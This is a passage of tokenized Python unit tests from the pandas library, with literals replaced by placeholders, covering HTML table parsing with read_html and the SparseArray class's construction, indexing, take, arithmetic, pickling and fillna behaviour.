banklist_data , '<STR_LIT>' , flavor = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_parse_dates_list ( self ) : <EOL> df = DataFrame ( { '<STR_LIT:date>' : date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) } ) <EOL> expected = df . to_html ( ) <EOL> res = self . read_html ( expected , parse_dates = [ <NUM_LIT:1> ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> res = self . 
read_html ( expected , parse_dates = [ '<STR_LIT:date>' ] , index_col = <NUM_LIT:0> ) <EOL> tm . assert_frame_equal ( df , res [ <NUM_LIT:0> ] ) <EOL> def test_parse_dates_combine ( self ) : <EOL> raw_dates = Series ( date_range ( '<STR_LIT>' , periods = <NUM_LIT:10> ) ) <EOL> df = DataFrame ( { '<STR_LIT:date>' : raw_dates . map ( lambda x : str ( x . date ( ) ) ) , <EOL> '<STR_LIT:time>' : raw_dates . map ( lambda x : str ( x . time ( ) ) ) } ) <EOL> res = self . read_html ( df . to_html ( ) , parse_dates = { '<STR_LIT>' : [ <NUM_LIT:1> , <NUM_LIT:2> ] } , <EOL> index_col = <NUM_LIT:1> ) <EOL> newdf = DataFrame ( { '<STR_LIT>' : raw_dates } ) <EOL> tm . assert_frame_equal ( newdf , res [ <NUM_LIT:0> ] ) <EOL> def test_computer_sales_page ( self ) : <EOL> data = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> self . read_html ( data , header = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def test_invalid_flavor ( ) : <EOL> url = '<STR_LIT>' <EOL> with tm . assertRaises ( ValueError ) : <EOL> read_html ( url , '<STR_LIT>' , flavor = '<STR_LIT>' ) <EOL> def get_elements_from_file ( url , element = '<STR_LIT>' ) : <EOL> _skip_if_none_of ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> url = file_path_to_url ( url ) <EOL> from bs4 import BeautifulSoup <EOL> with urlopen ( url ) as f : <EOL> soup = BeautifulSoup ( f , features = '<STR_LIT>' ) <EOL> return soup . find_all ( element ) <EOL> @ slow <EOL> def test_bs4_finds_tables ( ) : <EOL> filepath = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' ) <EOL> assert get_elements_from_file ( filepath , '<STR_LIT>' ) <EOL> def get_lxml_elements ( url , element ) : <EOL> _skip_if_no ( '<STR_LIT>' ) <EOL> from lxml . html import parse <EOL> doc = parse ( url ) <EOL> return doc . xpath ( '<STR_LIT>' . format ( element ) ) <EOL> @ slow <EOL> def test_lxml_finds_tables ( ) : <EOL> filepath = os . path . 
join ( DATA_PATH , "<STR_LIT>" ) <EOL> assert get_lxml_elements ( filepath , '<STR_LIT>' ) <EOL> @ slow <EOL> def test_lxml_finds_tbody ( ) : <EOL> filepath = os . path . join ( DATA_PATH , "<STR_LIT>" ) <EOL> assert get_lxml_elements ( filepath , '<STR_LIT>' ) <EOL> def test_same_ordering ( ) : <EOL> _skip_if_none_of ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> filename = os . path . join ( DATA_PATH , '<STR_LIT>' ) <EOL> dfs_lxml = read_html ( filename , index_col = <NUM_LIT:0> , flavor = [ '<STR_LIT>' ] ) <EOL> dfs_bs4 = read_html ( filename , index_col = <NUM_LIT:0> , flavor = [ '<STR_LIT>' ] ) <EOL> assert_framelist_equal ( dfs_lxml , dfs_bs4 ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> nose . runmodule ( argv = [ __file__ , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> exit = False ) </s>
<s> from pandas . compat import range <EOL> import re <EOL> import operator <EOL> import warnings <EOL> from numpy import nan <EOL> import numpy as np <EOL> from pandas import _np_version_under1p8 <EOL> from pandas . sparse . api import SparseArray <EOL> from pandas . _sparse import IntIndex <EOL> from pandas . util . testing import assert_almost_equal , assertRaisesRegexp <EOL> import pandas . util . testing as tm <EOL> class TestSparseArray ( tm . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> def setUp ( self ) : <EOL> self . arr_data = np . array ( [ nan , nan , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , nan , <NUM_LIT:4> , <NUM_LIT:5> , nan , <NUM_LIT:6> ] ) <EOL> self . arr = SparseArray ( self . arr_data ) <EOL> self . zarr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:6> ] , fill_value = <NUM_LIT:0> ) <EOL> def test_constructor_dtype ( self ) : <EOL> arr = SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , dtype = np . int64 ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , dtype = None ) <EOL> self . 
assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> , dtype = None ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> def test_constructor_spindex_dtype ( self ) : <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( arr , SparseArray ( [ np . nan , <NUM_LIT:1> , <NUM_LIT:2> , np . nan ] ) ) <EOL> self . assertEqual ( arr . dtype , np . float64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> dtype = np . int64 ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = np . int64 ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) , <EOL> fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> , dtype = np . int64 ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . 
fill_value , <NUM_LIT:0> ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = <NUM_LIT:1> , <EOL> sparse_index = IntIndex ( <NUM_LIT:1> , [ <NUM_LIT:0> ] ) , <EOL> dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> ] , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertTrue ( np . isnan ( arr . fill_value ) ) <EOL> arr = SparseArray ( data = [ <NUM_LIT:1> , <NUM_LIT:2> ] , sparse_index = IntIndex ( <NUM_LIT:4> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) , <EOL> fill_value = <NUM_LIT:0> , dtype = None ) <EOL> exp = SparseArray ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> , dtype = None ) <EOL> tm . assert_sp_array_equal ( arr , exp ) <EOL> self . assertEqual ( arr . dtype , np . int64 ) <EOL> self . assertEqual ( arr . fill_value , <NUM_LIT:0> ) <EOL> def test_get_item ( self ) : <EOL> self . assertTrue ( np . isnan ( self . arr [ <NUM_LIT:1> ] ) ) <EOL> self . assertEqual ( self . arr [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . arr [ <NUM_LIT:7> ] , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:2> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( self . zarr [ <NUM_LIT:7> ] , <NUM_LIT:5> ) <EOL> errmsg = re . compile ( "<STR_LIT>" ) <EOL> assertRaisesRegexp ( IndexError , errmsg , lambda : self . arr [ <NUM_LIT:11> ] ) <EOL> assertRaisesRegexp ( IndexError , errmsg , lambda : self . 
arr [ - <NUM_LIT:11> ] ) <EOL> self . assertEqual ( self . arr [ - <NUM_LIT:1> ] , self . arr [ len ( self . arr ) - <NUM_LIT:1> ] ) <EOL> def test_take ( self ) : <EOL> self . assertTrue ( np . isnan ( self . arr . take ( <NUM_LIT:0> ) ) ) <EOL> self . assertTrue ( np . isscalar ( self . arr . take ( <NUM_LIT:2> ) ) ) <EOL> if not _np_version_under1p8 : <EOL> self . assertEqual ( self . arr . take ( <NUM_LIT:2> ) , np . take ( self . arr_data , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( self . arr . take ( <NUM_LIT:6> ) , np . take ( self . arr_data , <NUM_LIT:6> ) ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) , exp ) <EOL> def test_take_fill_value ( self ) : <EOL> data = np . array ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> sparse = SparseArray ( data , fill_value = <NUM_LIT:0> ) <EOL> exp = SparseArray ( np . take ( data , [ <NUM_LIT:0> ] ) , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( sparse . take ( [ <NUM_LIT:0> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( data , [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( sparse . take ( [ <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> ] ) , exp ) <EOL> def test_take_negative ( self ) : <EOL> exp = SparseArray ( np . take ( self . arr_data , [ - <NUM_LIT:1> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . take ( [ - <NUM_LIT:1> ] ) , exp ) <EOL> exp = SparseArray ( np . take ( self . arr_data , [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> ] ) ) <EOL> tm . assert_sp_array_equal ( self . arr . 
take ( [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> ] ) , exp ) <EOL> def test_bad_take ( self ) : <EOL> assertRaisesRegexp ( IndexError , "<STR_LIT>" , lambda : self . arr . take ( <NUM_LIT:11> ) ) <EOL> self . assertRaises ( IndexError , lambda : self . arr . take ( - <NUM_LIT:11> ) ) <EOL> def test_take_filling ( self ) : <EOL> sparse = SparseArray ( [ np . nan , np . nan , <NUM_LIT:1> , np . nan , <NUM_LIT:4> ] ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ np . nan , np . nan , <NUM_LIT:4> ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , <EOL> allow_fill = False , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , <NUM_LIT:4> ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:2> ] ) , fill_value = True ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:5> ] ) , fill_value = True ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_take_filling_fill_value ( self ) : <EOL> sparse = SparseArray ( [ np . 
nan , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:0> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , <EOL> allow_fill = False , fill_value = True ) <EOL> expected = SparseArray ( [ <NUM_LIT:0> , np . nan , <NUM_LIT:4> ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:2> ] ) , fill_value = True ) <EOL> with tm . assertRaisesRegexp ( ValueError , msg ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:5> ] ) , fill_value = True ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_take_filling_all_nan ( self ) : <EOL> sparse = SparseArray ( [ np . nan , np . nan , np . nan , np . nan , np . nan ] ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . 
assert_sp_array_equal ( result , expected ) <EOL> result = sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ] ) , fill_value = True ) <EOL> expected = SparseArray ( [ np . nan , np . nan , np . nan ] ) <EOL> tm . assert_sp_array_equal ( result , expected ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , - <NUM_LIT:6> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse . take ( np . array ( [ <NUM_LIT:1> , <NUM_LIT:5> ] ) , fill_value = True ) <EOL> def test_set_item ( self ) : <EOL> def setitem ( ) : <EOL> self . arr [ <NUM_LIT:5> ] = <NUM_LIT:3> <EOL> def setslice ( ) : <EOL> self . arr [ <NUM_LIT:1> : <NUM_LIT:5> ] = <NUM_LIT:2> <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , setitem ) <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , setslice ) <EOL> def test_constructor_from_too_large_array ( self ) : <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , <EOL> SparseArray , np . arange ( <NUM_LIT:10> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) ) <EOL> def test_constructor_from_sparse ( self ) : <EOL> res = SparseArray ( self . zarr ) <EOL> self . assertEqual ( res . fill_value , <NUM_LIT:0> ) <EOL> assert_almost_equal ( res . sp_values , self . zarr . sp_values ) <EOL> def test_constructor_copy ( self ) : <EOL> cp = SparseArray ( self . arr , copy = True ) <EOL> cp . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> self . assertFalse ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT:0> ) . any ( ) ) <EOL> not_copy = SparseArray ( self . arr ) <EOL> not_copy . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> self . assertTrue ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT:0> ) . all ( ) ) <EOL> def test_constructor_bool ( self ) : <EOL> data = np . 
array ( [ False , False , True , True , False , False ] ) <EOL> arr = SparseArray ( data , fill_value = False , dtype = bool ) <EOL> self . assertEqual ( arr . dtype , bool ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . array ( [ True , True ] ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . asarray ( arr ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_index . indices , np . array ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) ) <EOL> for dense in [ arr . to_dense ( ) , arr . values ] : <EOL> self . assertEqual ( dense . dtype , bool ) <EOL> tm . assert_numpy_array_equal ( dense , data ) <EOL> def test_constructor_bool_fill_value ( self ) : <EOL> arr = SparseArray ( [ True , False , True ] , dtype = None ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertFalse ( arr . fill_value ) <EOL> arr = SparseArray ( [ True , False , True ] , dtype = np . bool ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertFalse ( arr . fill_value ) <EOL> arr = SparseArray ( [ True , False , True ] , dtype = np . bool , fill_value = True ) <EOL> self . assertEqual ( arr . dtype , np . bool ) <EOL> self . assertTrue ( arr . fill_value ) <EOL> def test_constructor_float32 ( self ) : <EOL> data = np . array ( [ <NUM_LIT:1.> , np . nan , <NUM_LIT:3> ] , dtype = np . float32 ) <EOL> arr = SparseArray ( data , dtype = np . float32 ) <EOL> self . assertEqual ( arr . dtype , np . float32 ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . array ( [ <NUM_LIT:1> , <NUM_LIT:3> ] ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_values , np . asarray ( arr ) ) <EOL> tm . assert_numpy_array_equal ( arr . sp_index . indices , np . array ( [ <NUM_LIT:0> , <NUM_LIT:2> ] ) ) <EOL> for dense in [ arr . to_dense ( ) , arr . values ] : <EOL> self . assertEqual ( dense . dtype , np . float32 ) <EOL> self . assert_numpy_array_equal ( dense , data ) <EOL> def test_astype ( self ) : <EOL> res = self . arr . 
astype ( '<STR_LIT>' ) <EOL> res . sp_values [ : <NUM_LIT:3> ] = <NUM_LIT> <EOL> self . assertFalse ( ( self . arr . sp_values [ : <NUM_LIT:3> ] == <NUM_LIT> ) . any ( ) ) <EOL> assertRaisesRegexp ( TypeError , "<STR_LIT>" , self . arr . astype , '<STR_LIT>' ) <EOL> def test_copy_shallow ( self ) : <EOL> arr2 = self . arr . copy ( deep = False ) <EOL> def _get_base ( values ) : <EOL> base = values . base <EOL> while base . base is not None : <EOL> base = base . base <EOL> return base <EOL> assert ( _get_base ( arr2 ) is _get_base ( self . arr ) ) <EOL> def test_values_asarray ( self ) : <EOL> assert_almost_equal ( self . arr . values , self . arr_data ) <EOL> assert_almost_equal ( self . arr . to_dense ( ) , self . arr_data ) <EOL> assert_almost_equal ( self . arr . sp_values , np . asarray ( self . arr ) ) <EOL> def test_to_dense ( self ) : <EOL> vals = np . array ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> vals = np . array ( [ <NUM_LIT:1> , np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:0> ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> vals = np . array ( [ np . nan , np . nan , np . nan , np . nan , np . nan ] ) <EOL> res = SparseArray ( vals ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> res = SparseArray ( vals , fill_value = <NUM_LIT:0> ) . to_dense ( ) <EOL> tm . assert_numpy_array_equal ( res , vals ) <EOL> def test_getitem ( self ) : <EOL> def _checkit ( i ) : <EOL> assert_almost_equal ( self . arr [ i ] , self . arr . values [ i ] ) <EOL> for i in range ( len ( self . 
arr ) ) : <EOL> _checkit ( i ) <EOL> _checkit ( - i ) <EOL> def test_getslice ( self ) : <EOL> result = self . arr [ : - <NUM_LIT:3> ] <EOL> exp = SparseArray ( self . arr . values [ : - <NUM_LIT:3> ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ - <NUM_LIT:4> : ] <EOL> exp = SparseArray ( self . arr . values [ - <NUM_LIT:4> : ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ - <NUM_LIT:12> : ] <EOL> exp = SparseArray ( self . arr ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> result = self . arr [ : - <NUM_LIT:12> ] <EOL> exp = SparseArray ( self . arr . values [ : <NUM_LIT:0> ] ) <EOL> tm . assert_sp_array_equal ( result , exp ) <EOL> def test_getslice_tuple ( self ) : <EOL> dense = np . array ( [ np . nan , <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:5> , np . nan , np . nan , <NUM_LIT:0> ] ) <EOL> sparse = SparseArray ( dense ) <EOL> res = sparse [ <NUM_LIT:4> : , ] <EOL> exp = SparseArray ( dense [ <NUM_LIT:4> : , ] ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> sparse = SparseArray ( dense , fill_value = <NUM_LIT:0> ) <EOL> res = sparse [ <NUM_LIT:4> : , ] <EOL> exp = SparseArray ( dense [ <NUM_LIT:4> : , ] , fill_value = <NUM_LIT:0> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> with tm . assertRaises ( IndexError ) : <EOL> sparse [ <NUM_LIT:4> : , : ] <EOL> with tm . assertRaises ( IndexError ) : <EOL> dense [ <NUM_LIT:4> : , : ] <EOL> def test_binary_operators ( self ) : <EOL> data1 = np . random . randn ( <NUM_LIT:20> ) <EOL> data2 = np . random . randn ( <NUM_LIT:20> ) <EOL> data1 [ : : <NUM_LIT:2> ] = np . nan <EOL> data2 [ : : <NUM_LIT:3> ] = np . 
nan <EOL> arr1 = SparseArray ( data1 ) <EOL> arr2 = SparseArray ( data2 ) <EOL> data1 [ : : <NUM_LIT:2> ] = <NUM_LIT:3> <EOL> data2 [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> farr1 = SparseArray ( data1 , fill_value = <NUM_LIT:3> ) <EOL> farr2 = SparseArray ( data2 , fill_value = <NUM_LIT:3> ) <EOL> def _check_op ( op , first , second ) : <EOL> res = op ( first , second ) <EOL> exp = SparseArray ( op ( first . values , second . values ) , <EOL> fill_value = first . fill_value ) <EOL> tm . assertIsInstance ( res , SparseArray ) <EOL> assert_almost_equal ( res . values , exp . values ) <EOL> res2 = op ( first , second . values ) <EOL> tm . assertIsInstance ( res2 , SparseArray ) <EOL> tm . assert_sp_array_equal ( res , res2 ) <EOL> res3 = op ( first . values , second ) <EOL> tm . assertIsInstance ( res3 , SparseArray ) <EOL> tm . assert_sp_array_equal ( res , res3 ) <EOL> res4 = op ( first , <NUM_LIT:4> ) <EOL> tm . assertIsInstance ( res4 , SparseArray ) <EOL> try : <EOL> exp = op ( first . values , <NUM_LIT:4> ) <EOL> exp_fv = op ( first . fill_value , <NUM_LIT:4> ) <EOL> assert_almost_equal ( res4 . fill_value , exp_fv ) <EOL> assert_almost_equal ( res4 . values , exp ) <EOL> except ValueError : <EOL> pass <EOL> def _check_inplace_op ( op ) : <EOL> tmp = arr1 . copy ( ) <EOL> self . assertRaises ( NotImplementedError , op , tmp , arr2 ) <EOL> bin_ops = [ operator . add , operator . sub , operator . mul , operator . truediv , <EOL> operator . floordiv , operator . pow ] <EOL> for op in bin_ops : <EOL> _check_op ( op , arr1 , arr2 ) <EOL> _check_op ( op , farr1 , farr2 ) <EOL> inplace_ops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for op in inplace_ops : <EOL> _check_inplace_op ( getattr ( operator , op ) ) <EOL> def test_pickle ( self ) : <EOL> def _check_roundtrip ( obj ) : <EOL> unpickled = self . round_trip_pickle ( obj ) <EOL> tm . assert_sp_array_equal ( unpickled , obj ) <EOL> _check_roundtrip ( self . 
arr ) <EOL> _check_roundtrip ( self . zarr ) <EOL> def test_generator_warnings ( self ) : <EOL> sp_arr = SparseArray ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . filterwarnings ( action = '<STR_LIT>' , <EOL> category = DeprecationWarning ) <EOL> warnings . filterwarnings ( action = '<STR_LIT>' , <EOL> category = PendingDeprecationWarning ) <EOL> for _ in sp_arr : <EOL> pass <EOL> assert len ( w ) == <NUM_LIT:0> <EOL> def test_fillna ( self ) : <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:1> ] , fill_value = - <NUM_LIT:1> ) <EOL> tm . assert_sp_array_equal ( res , exp ) <EOL> s = SparseArray ( [ <NUM_LIT:1> , np . nan , np . nan , <NUM_LIT:3> , np . nan ] , fill_value = <NUM_LIT:0> ) <EOL> res = s . fillna ( - <NUM_LIT:1> ) <EOL> exp = SparseArray ( 